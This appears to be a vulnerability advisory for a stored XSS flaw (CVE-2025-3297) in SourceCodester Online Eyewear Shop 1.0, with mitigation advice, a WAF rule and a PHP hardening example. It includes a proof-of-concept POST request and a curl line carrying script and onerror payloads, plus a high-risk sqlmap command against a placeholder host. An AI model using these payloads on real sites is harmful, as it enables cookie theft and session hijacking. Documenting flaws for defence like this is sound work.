How the CVE Works
The vulnerability exists in `/classes/Master.php?f=save_product` due to improper sanitization of the `brand` parameter. Attackers can inject malicious JavaScript payloads via this parameter, leading to stored XSS. When an admin or user views the affected product, the script executes in their browser, enabling session hijacking, defacement, or phishing. The attack is remotely exploitable with low privileges (PR:L) and requires user interaction (UI:P). CVSS 4.0 rates it 5.1 (Medium) due to limited impact on confidentiality (VC:N) and integrity (VI:L).
DailyCVE Form
Platform: SourceCodester Online Eyewear Shop
Version: 1.0
Vulnerability: Stored XSS
Severity: Medium
Date: 04/08/2025
What Undercode Say:
Exploitation:
1. Payload Injection:
POST /classes/Master.php?f=save_product HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

brand=<script>alert(document.cookie)</script>
2. Triggering XSS:
Visit any page displaying the `brand` value (e.g., product listings).
Protection:
1. Input Sanitization:
$brand = htmlspecialchars($_POST['brand'], ENT_QUOTES, 'UTF-8'); // HTML-context encoding; apply the same encoding wherever the stored value is echoed back into a page
2. Content Security Policy (CSP):
Content-Security-Policy: default-src 'self'; script-src 'self'
(script-src must not contain 'unsafe-inline' or 'unsafe-eval'; either would allow the injected inline `<script>` to execute and would make the policy useless against this bug.)
3. WAF Rules:
location ~ \.php$ {
    set $block_xss 0;
    # $args only covers the query string; the PoC above sends the payload in the POST body,
    # which stock nginx cannot inspect without a body-aware module (e.g. ModSecurity).
    if ($args ~* "<script") { set $block_xss 1; }
    if ($block_xss = 1) { return 403; }
}
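To show where the real fix belongs, here is an added example (not the Online Eyewear Shop's own code) with a stand-in for the `save_product` handler and the listing page that renders `brand`, side by side in vulnerable and hardened form. It assumes an in-memory array in place of the shop's database table and uses the PoC payload from above as constructed input.

```php
<?php
// Added example, not code from the Online Eyewear Shop project.
// Assumption: products are kept in an in-memory array instead of the shop's DB.
declare(strict_types=1);

/** Encode for HTML text and double-quoted attribute contexts. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Vulnerable pattern: the stored value is echoed into the page untouched. */
function render_brand_vulnerable(string $brand): string
{
    return "<td class=\"brand\">" . $brand . "</td>";
}

/** Hardened pattern: encode at the output point, in both text and attribute context. */
function render_brand_safe(string $brand): string
{
    return "<td class=\"brand\" data-brand=\"" . h($brand) . "\">" . h($brand) . "</td>";
}

/** Stand-in for save_product: validate before storing; raw storage is fine when output is encoded. */
function save_product(array &$store, array $post): bool
{
    $brand = trim((string)($post['brand'] ?? ''));
    if ($brand === '' || mb_strlen($brand, 'UTF-8') > 100) {
        return false; // reject empty or over-long brand names
    }
    $store[] = ['brand' => $brand];
    return true;
}

$store = [];
$payload = '<script>alert(document.cookie)</script>'; // constructed: the PoC payload from above
save_product($store, ['brand' => $payload]);

// The vulnerable renderer emits the script tag as markup; the hardened one emits &lt;script&gt; text.
echo "vulnerable: " . render_brand_vulnerable($store[0]['brand']) . "\n";
echo "hardened:   " . render_brand_safe($store[0]['brand']) . "\n";
```

Run with `php example.php`; the hardened line is what every template that prints `brand` (listings, edit forms, admin views) should produce.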
Detection:
1. CURL Check:
curl -X POST -d "brand=<img src=x onerror=alert(1)>" "http://target.com/classes/Master.php?f=save_product"
2. SQLi/XSS Scanners:
sqlmap -u "http://target.com/classes/Master.php?f=save_product" --data="brand=test" --risk=3 --level=5
Mitigation:
- Update to patched versions.
- Disable script execution in user-input fields.
- Audit all `$_GET`/`$_POST` handlers.
References:
- VulDB Entry
- OWASP XSS Cheat Sheet
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3297